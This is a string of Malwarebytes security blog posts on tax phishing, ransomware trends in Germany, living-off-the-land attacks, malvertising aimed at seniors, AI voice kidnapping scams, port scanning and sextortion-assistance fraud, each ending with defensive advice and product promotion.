IT NEWS

Last week, the IRS reminded taxpayers that Tax Day, April 18, is Tuesday this week. However, in some states like Alabama, California, and New York, the federal office extended the filing deadlines due to natural disasters. This is an excellent reason for scammers to keep launching tax scam campaigns even when tax is due tomorrow for most Americans.

Just a few weeks ago, we wrote about a fake IRS tax email carrying a malware payload: Emotet. Now, our Senior Director of Threat Intelligence, Jerome Segura, has found an email with the title “IRS Notice of intent to seize (Levy) Your Property or rights to property”, which was purportedly sent by “Tax IRS 152”.

The email, with an HTML file attachment, contains a short message:

Please note: [redacted]

<=> For information please continue to check here or use our free mobile=app. Updates status are made no more than once a day.

Opening the attached HTML file reveals a Microsoft email phishing page. According to Segura, stolen data is sent to a Telegram channel via a bot. So, avoid giving away your credentials, especially if your Microsoft email is tied to a business, if you don’t want scammers hijacking your account and using it for more nefarious purposes.

Avoiding tax scams

Here are some ways you can outsmart tax fraudsters and keep one step ahead of the phishing, malware, and social engineering attacks that come around every year during tax season.

• File early. One of the quickest ways to stumble into a trap is to leave filing your tax return until the last minute. That added pressure can mean responding to fake emails you otherwise would have ignored.
• Be careful around suspicious refunds. Tax agencies have a proper process for issuing refunds, as found on their websites. Some, like HMRC, are very clear that refunds are never issued by email. If in doubt, phone the tax office directly and ask if what you have is the real deal or a fake.
• Beware of fake bank portals. Some tax scams will ask you who you bank with, and then open up a phishing page for that bank. Always navigate directly to your banking website, click throughs and redirects typically spell danger.
• Avoid the pressure pitch. Tax scammers like to hurry you along to data theft and malware installs. Claims of only having 24 or 48 hours to file for a refund should be treated with skepticism. As with most solutions for these forms of social engineering, contact the tax entity directly.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are attacks where the victim opted not to pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.

Between April 2022 and March 2023, Germany was a globally significant target for ransomware gangs. During that period:

• It was the fourth most attacked country in the world, and the most attacked in the EU
• The construction sector was harder hit than in the USA, UK, or France
• LockBit and Black Basta accounted for 54% of known attacks
• Black Basta attacked targets in Germany far more often than in the UK or France

In August 2022, German power semiconductor manufacturer Semikron disclosed a ransomware attack that had partially encrypted its network, with the attackers claiming to have stolen 2TB of documents.

In the same month, German automotive parts powerhouse Continental was attacked by LockBit, which claimed to have stolen 40TB of files. The company broke off negotiations in late October, and the ransomware gang offered the data for sale or destruction for $50 million, the biggest known ransom of 2022, and the largest this author had seen until LockBIt’s equally outlandish request for $80 million from Royal Mail in early 2023.

A ransomware attack on German newspaper Heilbronner Stimme in October 2022 disrupted its printing systems, forcing the publication of a six-page emergency edition. The attack affected the entire Stimme Mediengruppe, including companies Pressedruck, Echo, and RegioMail, with Echo’s website and e-paper accessibility also compromised. Editor-in-chief Uwe Ralf Heer reported that a well-known cybercriminal group encrypted its systems and left ransom demands, but did not specify further.

In November 2022, the Vice Society ransomware gang claimed responsibility for a cyberattack on the University of Duisburg-Essen (UDE). The attackers leaked files including backup archives, financial documents, research papers, and student spreadsheets. On January 9, 2023, the university announced that due to extensive and complex damage caused by the attack, its entire IT infrastructure would need to be reconstructed.

Germany is a prime target

In the 12 months from April 2022 to March 2023, Germany was a globally significant target for ransomware, ranking as the fourth most attacked country by known attacks. It was the most attacked country in the EU, and the most attacked country where English isn’t the principle language.

Given the disparity between the USA and the rest of the world in terms of number of attacks, it would be easy to conclude that ransomware is, first-and-foremost, a USA problem. It is not. The size and nature of the US economy means that it has many more targets for ransomware gangs than other countries in the top ten.

We can account for the difference in the size of countries’ economies by dividing the number of known ransomware attacks by a country’s nominal GDP, which gives us an approximate rate of attacks per $1T of economic output. On that basis, the difference between the countries in the top ten is far smaller than the total number of known attacks would suggest. The top ten most attacked countries all suffered between 15 and 66 known attacks per $1T of economic output.

The size of the countries in the top ten also vary enormously, and we can try to account for that by dividing known attacks by the size of each country’s population. On that measure, again, the differences between countries are much smaller than a simple count of known attacks suggests.

On a known attacks per capita basis, Germany sits in a cluster of four advanced European economies with nearly identical rates of attack. In all the variations of our top ten, English-speaking countries occupy at least three of the top five positions, and English-speaking countries with smaller populations and economies, like Canada and Australia, seem to suffer disproportionately.

The situation in Germany is far from good, it just isn’t quite as bad as in the very worst countries. By any measure, Germany is one of the most attacked countries in the world, and its organisations are prime targets for ransomware gangs.

As in most countries, the German services sector is the most hard hit, accounting for 28% of attacks in the last 12 months, just slightly above the global average of 25%. In most respects, German industry sectors are attacked in roughly the proportions as they are in the UK and France, with some notable exceptions. There were no known attacks on German healthcare in the last 12 months (which, again, does not include unknown attacks), the country suffered fewer attacks on its legal services than either the UK or France, and it does not seem to have suffered the same problems France has had protecting its government sector, or the UK its education sector.

Where Germany suffers more than its neighbours is construction. Its 12% share of known attacks is double the global average, and notably higher than the USA (7%), UK (7%), and France (5%).

Black Basta’s hunting ground

In the UK, no individual ransomware was used in more than two known attacks on construction. In France one gang, LockBit, recorded three. In Germany, two different gangs recorded five known attacks against construction, accounting for a little over two thirds of the total. One of those gangs was LockBit, which is unsurprising given its position as by far the most used ransomware globally. The other was Black Basta, which recorded more attacks against German construction targets in 12 months than it did in the whole of France in the same period.

It seems Black Basta has an appetite for German targets. In the last 12 months it was the second most used ransomware in Germany, with 27 known attacks. In the same period it was busy in the UK with 10 attacks—but overshadowed by LockBit, Vice Society and others—it recorded just three attacks in France, where LockBit absolutely dominated.

In the last year, Black Basta and LockBit were the only ransomware that registered more than four known attacks in a month, with both going as high as eight. Between them, the two groups accounted for 54% of known attacks in Germany and largely determined whether the country would have a bad month at the hands of ransomware gangs or a terrible one.

Black Basta does not reinvent the wheel in the way it operates. Similar to other ransomware groups, attacks frequently begin with initial access gained through phishing attacks. A typical attack might start with an email containing a malicious document in a zip file. Upon extraction, the document installs the Qakbot banking trojan to create backdoor access and deploy SystemBC, which sets up an encrypted connection to a command and control server. From there, CobaltStrike is installed for network reconnaissance and to distribute additional tools.

As is the overarching trend for ransomware groups these days, Black Basta’s primary goal is to steal data so that it can hold the threat of leaked data over its victims. The data is generally stolen using Rclone, which filters and copies specific files to a cloud service. After the data is exfiltratrated, the ransomware encrypts files with the “.basta” extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. Attackers using Black Basta may be active on a victim’s network for two to three days before running their ransomware.

Conclusions

In the last 12 months, Germany was a globally significant hunting ground for ransomware gangs, and the country with the fourth highest total of known attacks. Across the various industry sectors, construction was over represented, suffering a higher proportion of known attacks than the construction sectors in the USA, France, and the UK. Much like the education sector in the UK and the government sector in France, it should be alarming that, with an entire world of targets to choose from, it has attracted a disproportionate amount of attention.

In particular, the German construction sector suffered at the hands of LockBit and Black Basta, which displayed a liking for German targets of all kinds and was the second most used ransomware. Black Basta recorded considerably more attacks in Germany in the last year than in either the UK or France. In fact, the only country in the world to suffer more Black Basta attacks in the last twelve months than Germany was the USA.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Regular readers of our monthly ransomware review (read our April edition here) know that Ransomware-as-a-Service (RaaS) gangs have been making headlines globally with their disruptive attacks on organizations.

Sometimes, though, it’s not enough to merely know about of the problem.

In order to truly protect ourselves from RaaS gangs, we have to ‘peel back the onion’, so to speak, and get a closer look at how, exactly, they behave. If we know how RaaS gangs evade detection once in a network, for example, we may be able to kick them out before they can do any damage.

One of the most concerning behaviors we’ve observed from RaaS gangs is their use of Living off the Land (LOTL) attacks, where attackers leverage legitimate tools to evade detection, steal data, and more.

Let’s dive into the dangers of LOTL attacks in RaaS operations and provide guidance for under-resourced IT teams on how to detect and block such threats.

The deceptive nature of LOTL attacks

In an ideal world, IT teams whose organizations are under attack would have clear and direct evidence of the malicious activity.

For example, if unusual network connections are being made to remote IP addresses associated with known malicious actors, then there’s little doubt that you’re under attack—enabling IT to put a halt to the behavior early on.

But now imagine you’re diligently monitoring a network for any signs of suspicious activity. As you scan a seemingly endless stream of logs, searching for any anomalies that could signal trouble, you notice some activity from PowerShell, a versatile and legitimate scripting tool.

Script Block Logging records all blocks of code as they’re executed by PowerShell, which could you point to suspicious activity. Source.

Namely, there are scripts using commands that an attacker could use to steal data from the company’s network, but which also resembled legitimate administrative tasks used by IT professionals for various system administration tasks. Considering it’s regular business hours, you figure it’s part of a routine IT maintenance operation and move on.

But, lo and behold, it was a RaaS gang the whole time!

The attacker had studied the company’s environment and had a deep understanding of the tools and processes typically used by employees, and so they managed to avoid raising suspicion by blending in with typical PowerShell usage. By conducting the attack during normal business hours, the attackers also avoided any of the usual scrutiny that would come from moving across a network late at night. 

This is exactly why LOTL attacks are so dangerous: by mimicking normal behavior, LOTL attacks make it extremely difficult for IT teams and security solutions to detect any signs of malicious activities. Experienced analysts, however, might be able to pick up on subtle anomalies or patterns that indicate a LOTL attack, leveraging their expertise and deep understanding of system behaviors.

On the other hand, new or under-resourced teams may struggle to identify such attacks due to a lack of experience or insufficient tools, leaving them vulnerable to these stealthy threats.

5 LOTL tools used by ransomware gangs 

While attackers use a seemingly innumerable amount of legitimate tools for LOTL attacks, below are five of the most common ones we’ve seen the most active ransomware gangs using for their attacks.

Again, readers of our monthly ransomware review will recognize that each gang listed here are responsible for the lion’s share of yearly ransomware attacks.

LockBit, for example, topped our 2023 State of Malware Report as being responsible for more than 3 times more attacks than the next most active ransomware, ALPHV. In February 2023 alone, the LockBit group identified 126 victims onto its leak page.

Vice Society, on the other hand, is responsible for 70 percent of known attacks on UK education institutions.

Advice for IT teams

The four tips listed below, combined of cutting-edge technology and unique expertise, can greatly help IT teams uncover LOTL attacks:

1. Regularly monitor network traffic and logs

• Regularly analyze your network traffic for any unusual patterns or connections to known malicious IP addresses or domains associated with the use of tools like Chisel, Qakbot, or Cobalt Strike. 
• Enable logging on critical systems (firewalls, servers, and endpoint devices) and regularly review logs for unusual activities or signs of compromise.

2. Stay informed of the latest threat intelligence

• Leverage threat intelligence feeds to stay informed about new attack techniques, indicators of compromise (IOCs), and other relevant threat data.
• Use this data to fine-tune your security monitoring, detection, and response capabilities to identify and mitigate LOTL attacks.

3. Leverage behavioral analysis and anomaly detection

• Implement advanced monitoring tools that focus on detecting unusual user or system behavior rather than relying solely on known signatures or patterns.
• Machine learning and artificial intelligence can be leveraged to identify deviations from normal behavior, which might indicate an ongoing LOTL attack.

Malwarebytes EDR observes the behaviors of processes, registry, file system, and network activity on the endpoint using a heuristic algorithm looking for deviations. Here you can see all detection rules triggered in the suspicious activity and their mapping to MITRE ATT&CK.

4. Restrict the abuse of legitimate tools

• Focus on managing and controlling the use of legitimate tools and system features often exploited in LOTL attacks.
• Limit access to certain tools only to users who require them, monitoring their usage, and applying specific security policies to restrict potentially harmful actions.

In short, by continuously analyzing network and system data, identifying potential weak points, and anticipating attacker tactics, IT teams can begin to get the upper-hand against RaaS gangs that employ LOTL techniques.

24×7 security monitoring and threat hunting for your organization

Monitoring network traffic, enabling and reviewing logs, checking for anomaly detection, and implementing application control are essential steps for detecting and blocking malicious activity. However, these efforts often require around-the-clock coverage and deep cybersecurity expertise, which can be difficult for small and medium-sized organizations to maintain.

This is where Malwarebytes Managed Detection and Response (MDR) comes in.

stop hidden threats

Malwarebytes MDR analysts are experienced in detecting malicious use of legitimate tools and blocking attackers. They use their expertise to identify unusual patterns or connections to malicious IP addresses, domains, or unauthorized application usage related to the LOTL attacks conducted by the RaaS gangs.

By partnering with Malwarebytes MDR, businesses can enhance their security posture and gain peace of mind, knowing that a skilled team of security experts is working 24x7x365 to proactively detect and respond to potential threats. Find more MDR resources below!

• How to choose an MDR vendor: 6 questions to ask

• Is an outsourced SOC worth it? Looking at the ROI of MDR

• 3 ways MDR can drive business growth for MSPs

• Cyber threat hunting for SMBs: How MDR can help

The internet is full of Airbnb scams and accounts told by victims. But there is a twist in this latest story-gone-viral that is usually lacking in most narratives: The victim evens the score.

Airbnb host and scammer “Mr. Tyler” met his match when his would-be guest, TikTok user Olivia (@livvoogus), discovered his personal information after arriving at a property in Florida she could not get into. Her scam suspicions were confirmed that day.

In a TikTok clip detailing the events, she revealed she booked the place months before the New Year’s Eve music festival she and her friends planned to attend. The listing didn’t raise any red flags, and Mr. Tyler was a Superhost—described as “the best-rated, most experienced hosts” by Airbnb. The property also had good reviews.

Then things got sketchy while driving up to Jacksonville.

“The Airbnb host had sent us two different codes for the door and just stopped responding to any questions that we had, like where to park or how to get into the building—just kind of went ghost,” Olivia said. The neighbor came out and told them that a couple who came by last night also couldn’t get in, suggesting they were not the only ones Mr. Tyler scammed.

“The person who had lived there got evicted because, according to the lease, you’re not allowed to do Airbnbs out of the apartment, and he just never took the listing down,” she said.

Enraged, Olivia searched the internet for details about her host and eventually found his name, birthday, and parents’ address. She messaged Mr. Tyler to ask if she was supposed to meet him at his parents’ place, the address of which she included, because what he gave them was the incorrect address.

“This man called me back. So. Quickly,” Olivia enthused. What came next was also recorded and posted on TikTok. The clip was captioned, “when you travel long and far to find out your airbnb is fake and you go to extreme lengths to find out everything about the host and then call them to expose such information.”

In the end, Airbnb refunded Olivia, and she found a hotel room. The company paid a percentage of the cost for the following night, although Olivia believes Airbnb should’ve paid for it all. One TikTok commenter jokingly suggested that Olivia “send a bill to Tyler’s parents’ house”.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Knowing their audience is something scammers excel at, and for very good reason. This is particularly true for tech support scammers whose prime targets are seniors.

By understanding what retirees are searching for and abusing various online platforms, crooks can precisely go after the demographic they are interested in and lure them onto sites that they control.

We have been observing a specific malvertising campaign via Google ads aimed at seniors. The threat actor is creating hundreds of fake websites via the Weebly platform to host decoy content to fool search engines and crawlers while redirecting victims to a fake computer alert.

Based on our analysis, this particular scheme started sometime in the summer of 2022 but has drastically increased in prevalence in the past month. While we have been sharing details with affected parties privately for a few weeks, we are now exposing what we know. 

Popular search terms

Malvertising, or the use of ads to deliver malicious content, is not something new. Yet, over the years various threat actors have used it for different purposes.

It is a cost effective and efficient way to reach targets and then monetize those with a certain payload that can be anything from malicious software or plain old scams. But we don’t tend to hear about the latter as much because the impact of scams may be harder to quantify.

In talking to victims, you will often hear them describe that they were just looking up for something and clicked somewhere when all the sudden this or that happened.

As we saw an increase in our telemetry for tech support scam pages, we decided to replicate some of those searches and came up with keywords we thought the senior/retired audience might use often. In order to maximize our chances of identifying the campaign we used a real machine and prepared with a specific profile.

By far, anything related to recipes and cooking is a popular search query. We had previously identified another malvertising campaign using this same theme.

We also tried to look for games such as Solitaire:

And of course, we couldn’t do without checking on the weather:

Decoy sites

While the links for the sponsored sites may look legitimate, they aren’t. The problem is that unless you are the intended victim, you will only see the clean content. It matters because crawlers and other ad quality check tools may validate the advertiser and allow the ad to be reached by a large audience.

Each site is very simple and contains content that was stolen from somewhere else and put together hastily.

The threat actor has been creating hundreds of those websites via the Weebly platform which they are abusing. Some days, we saw an average of 10 new Weebly hostnames used by the scammers.

Cloaking

As mentioned earlier, it is important for the scammers to stay under the radar and make it as though these webpages are legitimate. They can do this easily by using a technique known as cloaking.

Cloaking is simply showing different content based on a target audience and being able to hide the payload from some non desirable visitors (i.e. web crawlers, security researchers).

The scammers did this in various ways, some quite simple (user-agent and IP check) but they also paid for a professional cloaking service.

The cloaker API will return a response that contains two different links:

• The “safe_page” which is the URL for the decoy Weebly site

• The “money_page” which is the URL to make money from

In this case the money page is a URL belonging to Digital Ocean and hosting a tech support scam page.

Tech support scam

Most scammers will use a template for the tech support scam page which is customized for the operating system and browser the victim is running. This scheme is adapted for both Windows and Mac, supporting the Chrome, Opera, Safari and Firefox browsers.

In this case they are also abusing a browser feature that remaps keystrokes when a page is in fullscreen by targeting the navigator.keyboard.lock API. What this means in practical terms is that the user will not be able to exit from the fullscreen page unless they press and hold the Escape key for several seconds. Many people will panic and call the phone number on the screen, only to fall in the hands of scammers and lose hundreds, sometimes even thousands of dollars.

Protection from malvertising attacks

Malvertising can come in different forms and ad formats, and the same can be said about the payloads that are distributed.

As we saw earlier this year, clicking on the top ad for a software download doesn’t always get you what you wanted, in fact it can infect your computer with malware. Threat actors are very good at impersonating legitimate brands and setting convincing websites.

We have reported and continue to report this malvertising campaign to Google and Block Inc. (Weebly).

We always recommend using a layered approach to security and for malvertising you will need web protection combined with anti-malware protection. Malwarebytes Premium for consumers and Endpoint Protection for businesses provide real-time protection against such threats.

TRY NOW

You may have seen a worrying report of Artificial Intelligence (AI) being used in a virtual kidnapping scam. The AI was supposedly used to imitate the voice of an Arizona resident’s daughter, who claimed to have been kidnapped. The daughter was safe and well elsewhere on a school trip. Unfortunately, with the daughter out of sight this just made the scam seem more believable. Was she actually on the trip, or kidnapped? With no way to know right away, all the parent could do was listen to a demand for $1m and the threat of terrible things happening to their daughter.

The scammers dropped the ransom down to $50k after being told that the money simply wasn’t available, and while all of this was going on, a friend of the family, and law enforcement, were able to confirm that the supposedly kidnapped daughter was in fact safe and well.

Virtual kidnapping scams have been around for many years, but this is a new spin on a well-worn technique.

The imitated child’s parent is convinced that some form of AI was used in this instance. To do this, scammers would have had to obtain some samples of the daughter’s voice. The samples would then have been fed into a machine learning algorithm which learned how she speaks, giving the scammers a computer program that can speak like the victim.

This technique certainly works, and can produce strartling results. To hear for yourself, take a listen to podcast.ai, a podcast entirely generated by AI, that features guests like the late Steve Jobs.

The case for AI

Can we be sure that what happened here was down to AI?

The victim claims that the voice was definitely that of her daughter. You would expect someone to recognise a fake or an imitation of their own child. Think how many celebrity impersonators you’ve heard on TV or elsewhere, and how many of them are actually good at it. More often than not, the slightest imperfections really stand out. Now apply this to a mother and her daughter. She’s going to have a very good idea what her offspring does and doesn’t sound like.

Subbarao Kambhampati, a computer science professor at Arizona State University, told the New York Post that it’s possible to spoof a voice in convincing fashion from just three seconds of audio.

According to the victim, her daughter has no social media presence to speak of, but has done a few short public interviews. In theory, this could be enough for the fraudsters to create a working facsimile of her voice.

None of this is proof that AI was used, but none of it rules out AI either.

The case against AI

Creating a replica voice from three seconds of audio sounds scary, but in practice things aren’t quite so cut and dry. We covered a great example of this a little while ago, involving a journalist logging into his telephone banking via use of AI voice replication. It’s definitely not an exact science, and getting the voice right can take many attempts, samples, and requires an AI tool that can stitch everything together to an acceptable standard.

In terms of the mother’s claim she recognised her daughter’s voice, that’s complicated. Understandably, she will have experienced a considerable level of panic when receiving the call, and that might have affected her ability to identify her daughter. CNBC wrote about the phenonmenon of virtual kidnappings in 2018, before the current AI boom. In every case listed in its article, the person stuck on the phone is convinced the voice on the other end of the line is who the fake kidnapper claims them to be. Teenage sons, younger daughters, men in their thirties…the horror of these calls has the victim pretty much ready to stand up in court and state that this was the real deal.

This effect of “Yes, it’s them” has been happening for years, long before AI came onto the scene. Is this what’s happened in the AI kidnap scam above? And why would virtual kidnappers bother to replicate someone’s voice if the victim is going to believe it’s all real anyway?

Protection from virtual kidnap scams

Steering clear of this kind of attack isn’t particularly affected by whether or not the person screaming down the phone is an impersonator or a slice of AI. The basics remain the same, and social engineering is where a lot of these attacks take shape. It’s not a coincidence that most of these stories involve the supposed kidnap victim being on holiday or away from the family home when the bogus call comes through. There are some things you can do to blunt the effect of virtual kidnap scams:

• Be vacation smart. Avoid posting travel dates and locations that could add some fake legitimacy to a scammer’s call.

• Make your data private. Revisit your online presence, and lock down or delete your data so scammers know less about you.

• A plausible alert. Consider a password that family members can use to confirm they actually are in danger.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Compromised IP addresses and domains—otherwise legitimate sites that are exploited by hackers without the owner’s knowledge—are frequently utilized to conduct port scanning attacks.

Port scanning involves systematically scanning a computer network for open ports, which can then be exploited by threat actors to gain unauthorized access or gather information about the system’s vulnerabilities.

In this article, we will explain the two biggest threats utilizing port scanning attacks, RDP attacks and Mirai botnets, and how businesses can protect themselves using Malwarebytes for Business.

Compromised detections: RDP attacks and Mirai botnets

Cybercriminals typically conduct reconnaissance on the target port before using what are called dictionary attacks, entering and trying out known usernames and passwords to see if any of the combinations grant access.

The two most common detections of compromised IP addresses are systems scanning for open RDP (Remote Desktop Protocol) ports and IoT (Internet of Things) botnets, such as Mirai.

Remote Desktop Protocol is exactly what the name implies, a tool for remotely controlling a PC that gives you all the power and control you would have if you were actually sitting behind it—which is what makes it so dangerous in the wrong hands. In fact, one of the primary attack vectors for ransomware attacks has been the Remote Desktop Protocol (RDP).

RDP port scanners, often found in the form of compromised servers, scan the internet for open RDP ports by trying the default port for RDP, TCP 3389. The cybercriminals that control the compromised server then try to brute-force their way in, repeatedly entering common username and password combos to find RDP login credentials.

Other than RDP, cybercriminals often perform port scans for various other network protocols, including FTP (20/21), POP3 (110/995), IMAP (143/993), SMTP (25/465/587), and SQL (1433/1434/3306). Gaining access through RDP and other network protocols allows attackers to infiltrate systems and deploy various malware.

Mirai, on the other hand, is a botnet primarily composed of Internet of Things (IoT) devices such as IP cameras, routers, and other internet-connected devices. Mirai actively scans the internet for open telnet servers on ports 23 or 2323, and, upon discovering one, attempts authentication using known default credentials. Such credentials are easy to find in many IoT devices—they’re often the prepackaged combination of “admin” and “admin” for both username and password whenever customers first purchase a product to set it up. 

If successful in its malicious login attempts, Mirai compromises the device and integrates it into the existing botnet.

In addition to launching DDoS attacks, botnets like Mirai can aid hackers in weakening website security, stealing credit card information, and distributing spam.

Protecting your business with Malwarebytes for Business

Malwarebytes for Business offers a comprehensive solution to monitor and manage threats, including detections from compromised IP addresses scanning for and attacking open ports.

For example, Malwarebytes blocks the IP address 5.39.37.10 as it is associated with the Mirai botnet, and 81.198.240.73 because it has been found to be involved in RDP probes or attacks.

Brute Force Protection policies in Nebula, our cloud-hosted security platform, can be configured to specify which protocols to protect, the ports used (default or custom), and create trigger rules. If set to monitor and detect, the policy will not block the ports. However, if set to block, it will utilize the Windows Firewall to block communications based on the configured rules.

When a block is implemented, the offending IP address will be placed in a “jail” for a predetermined duration, such as 30 minutes as shown in the example screenshot above. Blocks last a max of 60 minutes because IP addresses might be reassigned to legitimate users, or an attacker may leverage a legitimate user’s IP address. 

There are two kinds of inbound connections that Malwarebytes can detect, Blocked Inbound Connections and Found Inbound Connections.

Blocked inbound connections

Detections with the following fields reported typically occur when a port is open and exposed to the internet:

• Type: Inbound Connection

• Action Taken: Blocked

These detections are prevented by the Web Protection real-time protection layer. When these detections occur, it means the IP address being blocked is scanning or attempting to force its way into the endpoint using different ports.

Malwarebytes blocks IP addresses that have a history of abuse and is correctly preventing malicious connections.

Found inbound connections

Detections with the following fields reported are typically a result of having open ports in the router or firewall:

• Type: Inbound Connection

• Action Taken: Found

• Detection Name: RDP Intrusion Detection

These detections occur based on your Brute Force Protection trigger rule settings specified in the Nebula policy.

Configuring Brute Force Protection in Nebula

To configure Brute Force Protection in Nebula:

1. On the left navigation menu, go to Configure > Policies.

2. Select a policy, then select the Brute Force Protection tab.

3. Select the following protocols for your workstations or servers:

• Workstation and server protocols: Check mark the RDP protocol.

• Server-only protocols: Check mark the FTP, IMAP, MSSQL, POP3, SMTP, or SSH protocols.

4. Configure custom port settings based on your endpoint environment and protocol requirements.

5. Create a Trigger rule based on the number of failed remote login attempts within a certain minute range across all enabled protocols. Choose to either block the IP address or monitor and detect the event when the trigger threshold is reached.

6. Optionally, enable the option to Prevent private network connections from being blocked.

7. When enabled, endpoints within private network address ranges will not trigger Brute Force Protection due to failed login attempts. This excludes the following network ranges:

• 10.0.0.0/8 (10.0.0.0-10.255.255.255)

• 172.16.0.0/12 (172.16.0.0-172.31.255.255)

• 192.168.0.0/16 (192.168.0.0-192.168.255.255)

• 127.0.0.0/8 (127.0.0.0-127.255.255.255)

8. Click Save at the top-right of your policy.

Safeguarding your business from compromised threats

By leveraging Malwarebytes for Business’ advanced threat detection and protection capabilities, businesses can effectively protect themselves against attacks that result from compromised IP addresses and domains, including RDP attacks (and attacks against other network protocols) and IoT botnets. Configuring Brute Force Protection in Nebula allows companies to stay one step ahead of cybercriminals and ensure the safety of their networks and data.

Protection from port scanning attacks is only one aspect of Malwarebytes for Business’ multi-layered approached to defense, which includes an all-in-one endpoint security portfolio that combines 21 layers of protection.

Request Your Free Malwarebytes Business Trial 

Days ago, several Google Pay users in the US received some unexpected cashback from Google, congratulating them “for dogfooding the Google Pay Remittance experience”. Confused (and a tad happy), some looked to Twitter for answers, while others aired their experiences on the /r/googlepay/ Reddit page.

Freelance journalist Mishaal Rahman was one of the many recipients of free money. He got $46 in “rewards” from the app, while someone else got six rewards of almost $100 each.

“Open GPay, swipe to the ‘Deals’ tab, and see if you have any ‘rewards’ near the top. That’s where I’m seeing this,” Rahman tweeted. “I suspect this is an error, so that money is just gonna sit in my account for now lol.”

Not every Google Pay user received this welcome surprise, though.

Wait. Dogfooding?

Dogfooding is an IT slang that means using one’s own product. By this definition, these messages and cashback rewards seemed intended for individuals working in Google or testing partners. Yet none of the recipients were either.

“It appears to be an unintended early launch, presumably it has something to do with the new price guarantee for flights,” replied a moderator to the threat on the said Google Pay Reddit page. “Nothing to be worried about.”

The price guarantee the moderator referred to is a pilot program within Google Flights, Google’s online flight booking service. This program aims to pay back Flights users the difference, which must be greater than $5, between the flight price upon booking and the lowest ticket price via Google Pay.

This explanation sounds plausible. However, Google neither confirmed nor denied this to be the reason for the hiccup.

In a follow-up to Rahman and the many recipients of the cashback reward, the Google Pay team said the cash they received was unintended. The team also reversed the credit and reassured them no further action was required.

And, yes, if wrongfully rewarded users already transferred or spent the money they received, it’s theirs to keep, the team said.

The email Rahman received from the Google Play team, telling him the free money he received was a mistake. (Source: Mishaal Rahman)

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The FBI is warning of a particular aspect of sextortion scams: Supposed organisations that offer “help” to remove stolen images, often at a significant financial cost (and no guarantee of success).

Sextortion, the act of blackmailing individuals for cash in return for not leaking sensitive imagery and videos, has been a problem for many years. Sometimes it’s done by criminals, other times it’s by people known to the target. The imagery may be stolen from online cloud storage, leaked from a server, or obtained by compromising a PC with malware. The end result is the same: blackmail, and the threat of sending the images to friends and family, or just dumping them online.

A sub-industry of sorts has grown up around the sextortion marketplace. Companies which can supposedly help you remove sextortion content or shut down blackmailers, offer to help those in need of assistance. These organisations may be contacted by the victims directly (for example, via adverts or search engine results) or they may make contact by another method.

The FBI believes at least some of these entities may be involved in sextortion attacks themselves. However you stack it up, these supposed businesses have no real way to get material taken offline and kept offline. Unless the people holding on to the stolen content are somehow chased offline forever, there’s nothing stopping them from putting it back or reconnecting with their target.

The whack-a-mole technique, and how “help” can make things worse

This is somewhat similar to those mugshot sites, which scrape mugshots and place them online along with the details of the person in the photograph. They offer to take them down, for a price, but more often than not once the victim pays up the images reappear on a related site and they’re back to square one.

As the FBI notes, law enforcement assistance is free (and there’s slightly more chance of the people responsible getting into trouble for their actions). Here’s some examples provided by the FBI with regard to what bogus assistance looks like in practice, and how the “assistance” can make things worse:

• A company solicited multiple payments totaling $5,000 from a juvenile sextortion victim after coercing the victim with threats of reputational harm, falsely indicating the victim would be unable to go to college or get a job and the victim’s parents would lose their jobs. The victim contacted the company for help after being sextorted via social media.
• A juvenile sextortion victim contacted and hired a company for $2,000. When the victim declined to pay for additional services, the company told the victim the sextortion perpetrator asked for $5,000. At that point, the victim paid for the additional services, for which the company charged him an additional $3,200.
• A company representative contacted the mother of a juvenile sextortion victim and offered to locate the sextortionist in exchange for $1,500. The representative also discouraged the victim’s mother from seeking assistance from law enforcement. It was not clear how the company representative knew about the sextortion or how they obtained the contact information for the victim’s mother.

Here at Malwarebytes, we’ve seen numerous examples of sextortion help advertised online which may (or more likely, may not) be of use to the person being targeted. Back in 2019 we spotted an ad making some bold claims about “keeping explicit images off the internet”. Sure, it might be legitimate, or it could just as easily be designed to suck someone in still further from a problem they can no longer escape. There’s never any real way to know for sure, and this is a primary reason why your first port of call should be law enforcement.

How to spot a sextortion assistance scam

The FBI has some recommendations when dealing with sextortion scams where anything assistance related is concerned. Supposed business entities may lean into your sense of fear, shame, and desperation to get the problem “solved”. In other words, they’ll act in a manner very similar to those performing the extortion in the first place. Signs to watch out for:

• A company representative contacts you and offers assistance services for which the company charges fees;
• The company advertises sextortion assistance in exchange for fees;
• You are asked to pay the fees before the assistance services are rendered;
• The company requires you to sign a contract for their services;
• The company representative discourages you from contacting law enforcement or tells you contacting law enforcement is not the best way to get help;
• The company uses high-pressure or scare tactics in an effort to secure your business; or
• The for-profit company claims to be connected to government or law enforcement officials.

Malwarebytes tips for dealing with sextortion

We have many tips for all aspects of romance and sextortion attempts, and here’s some of the main things you can do to help yourself avoid sextortion fraud:

• Don’t panic. If a scammer tells you they have compromising images of you and they show you no evidence of the images, they probably don’t have any. Offering “proof” such as a password or phone number of yours just means they’ve got that data from a breach, and doesn’t mean they have access to your computer or webcam.
